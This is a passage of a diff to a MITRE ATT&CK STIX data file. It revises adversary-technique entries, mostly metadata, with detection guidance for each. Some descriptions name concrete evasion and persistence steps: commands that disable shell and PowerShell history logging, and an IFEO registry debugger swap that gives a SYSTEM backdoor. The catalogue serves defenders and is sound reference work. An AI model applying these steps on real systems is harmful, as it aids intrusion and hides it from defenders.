specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-03-29T22:32:25.985Z", + "created": "2020-02-26T17:46:13.128Z", + "x_mitre_defense_bypassed": [ + "Host forensic analysis" ], "x_mitre_data_sources": [ "Process command-line parameters", "Process monitoring", "File monitoring" ], - "x_mitre_defense_bypassed": [ - "Host forensic analysis" + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" ] }, { @@ -12290,14 +14502,14 @@ "url": "https://attack.mitre.org/techniques/T1147" }, { - "url": "https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty", - "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 8, 2017.", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020.", "source_name": "Cybereason OSX Pirrit" } ], "revoked": true, "type": "attack-pattern", - "modified": "2020-03-13T21:02:19.830Z", + "modified": "2020-07-31T17:42:43.677Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -12308,8 +14520,8 @@ "url": "https://attack.mitre.org/techniques/T1564/002" }, { - "url": "https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty", - "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 8, 2017.", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020.", "source_name": "Cybereason OSX Pirrit" } ], @@ -12327,7 +14539,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-29T22:36:25.994Z", + "modified": "2020-07-31T17:42:43.768Z", "created": "2020-03-13T20:12:40.876Z", "x_mitre_data_sources": [ "File monitoring", @@ -12424,13 +14636,6 @@ ] }, { - "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", - "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", - "name": "Hide Artifacts", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], "external_references": [ { "source_name": "mitre-attack", @@ -12443,8 +14648,8 @@ "source_name": "Sofacy Komplex Trojan" }, { - "url": "https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty", - "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 8, 2017.", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 31, 2020.", "source_name": "Cybereason OSX Pirrit" }, { @@ -12458,6 +14663,13 @@ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020." } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)", + "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "type": "attack-pattern", "kill_chain_phases": [ { @@ -12465,16 +14677,8 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-07-06T19:03:40.511Z", + "modified": "2020-09-23T11:31:50.636Z", "created": "2020-02-26T17:41:25.933Z", - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_is_subtechnique": false, - "x_mitre_version": "1.0", - "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.", "x_mitre_data_sources": [ "API monitoring", "PowerShell logs", @@ -12482,6 +14686,14 @@ "Process command-line parameters", "Process monitoring", "File monitoring" + ], + "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ] }, { @@ -12519,7 +14731,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-26T16:09:59.324Z", + "modified": "2020-10-17T15:15:28.288Z", "created": "2020-03-12T20:38:12.465Z", "x_mitre_data_sources": [ "Environment variable", @@ -12696,6 +14908,124 @@ ], "x_mitre_version": "2.0" }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1590.005", + "url": "https://attack.mitre.org/techniques/T1590/005" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + }, + { + "source_name": "DNS Dumpster", + "url": "https://dnsdumpster.com/", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020." + }, + { + "source_name": "Circl Passive DNS", + "url": "https://www.circl.lu/services/passive-dns/", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "IP Addresses", + "description": "Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:03:29.213Z", + "created": "2020-10-02T15:59:11.695Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1591.003", + "url": "https://attack.mitre.org/techniques/T1591/003" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify Business Tempo", + "description": "Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization\u2019s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim\u2019s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))", + "id": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:10:12.352Z", + "created": "2020-10-02T16:34:32.435Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1591.004", + "url": "https://attack.mitre.org/techniques/T1591/004" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify Roles", + "description": "Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "id": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:10:36.279Z", + "created": "2020-10-02T16:37:30.015Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "id": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99", "name": "Image File Execution Options Injection", @@ -12799,7 +15129,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Image File Execution Options Injection", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., C:\\dbg\\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)", "id": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "type": "attack-pattern", "kill_chain_phases": [ @@ -12812,15 +15142,15 @@ "phase_name": "persistence" } ], - "modified": "2020-03-24T19:39:50.839Z", + "modified": "2020-08-26T14:18:08.480Z", "created": "2020-01-24T15:05:58.384Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "Administrator", "SYSTEM" ], - "x_mitre_detection": "Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)", + "x_mitre_detection": "Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)", "x_mitre_data_sources": [ "API monitoring", "Windows event logs", @@ -12835,6 +15165,78 @@ "Windows" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1562.003", + "url": "https://attack.mitre.org/techniques/T1562/003" + }, + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + }, + { + "source_name": "Microsoft PowerShell Command History", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7", + "description": "Microsoft. (2020, May 13). About History. Retrieved September 4, 2020." + }, + { + "source_name": "Sophos PowerShell command audit", + "url": "https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit", + "description": "jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020." + }, + { + "source_name": "Sophos PowerShell Command History Forensics", + "url": "https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics", + "description": "Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Impair Command History Logging", + "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.\n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", + "id": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-16T18:25:12.727Z", + "created": "2020-02-21T20:56:06.498Z", + "x_mitre_contributors": [ + "Vikas Singh, Sophos", + "Emile Kenning, Sophos" + ], + "x_mitre_version": "2.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_defense_bypassed": [ + "Host forensic analysis", + "Log analysis" + ], + "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL, HISTFILE, or HISTFILESIZE environment variables may be suspicious.\n\nMonitor for modification of PowerShell command history settings through processes being created with -HistorySaveStyle SaveNothing command-line arguments and use of the PowerShell commands Set-PSReadlineOption -HistorySaveStyle SaveNothing and Set-PSReadLineOption -HistorySavePath {File Path}. ", + "x_mitre_data_sources": [ + "PowerShell logs", + "Process command-line parameters", + "Environment variable", + "File monitoring", + "Authentication logs", + "Process monitoring" + ], + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ] + }, { "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.", @@ -12857,7 +15259,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-07-09T14:43:42.718Z", + "modified": "2020-10-19T16:31:35.249Z", "created": "2020-02-21T20:22:13.470Z", "x_mitre_platforms": [ "Linux", @@ -13145,7 +15547,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-29T21:43:29.196Z", + "modified": "2020-10-16T18:09:49.074Z", "created": "2017-05-31T21:30:55.892Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -13172,9 +15574,19 @@ "x_mitre_version": "1.1" }, { - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2018-04-18T17:59:24.739Z", + "modified": "2020-06-20T22:09:22.559Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } ], + "type": "attack-pattern", + "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Indirect Command Execution", + "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", "external_references": [ { "source_name": "mitre-attack", @@ -13197,22 +15609,21 @@ "source_name": "RSA Forfiles Aug 2017" } ], - "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", - "name": "Indirect Command Execution", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "modified": "2020-06-20T22:09:22.559Z", - "created": "2018-04-18T17:59:24.739Z", - "x_mitre_version": "1.1", - "x_mitre_contributors": [ - "Matthew Demaske, Adaptforward" + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)", + "x_mitre_defense_bypassed": [ + "Static File Analysis", + "Application control", + "Application control by file name or path" ], "x_mitre_data_sources": [ "File monitoring", @@ -13220,24 +15631,25 @@ "Process command-line parameters", "Windows event logs" ], - "x_mitre_defense_bypassed": [ - "Static File Analysis", - "Application control", - "Application control by file name or path" + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" ], - "x_mitre_detection": "Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)", - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_platforms": [ - "Windows" - ], - "x_mitre_is_subtechnique": false + "x_mitre_version": "1.1" }, { - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2017-05-31T21:31:16.408Z", + "modified": "2020-03-20T15:42:48.595Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } ], + "type": "attack-pattern", + "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.", "external_references": [ { "source_name": "mitre-attack", @@ -13250,20 +15662,19 @@ "source_name": "University of Birmingham C2" } ], - "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.", - "name": "Ingress Tool Transfer", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", - "type": "attack-pattern", - "kill_chain_phases": [ - { - 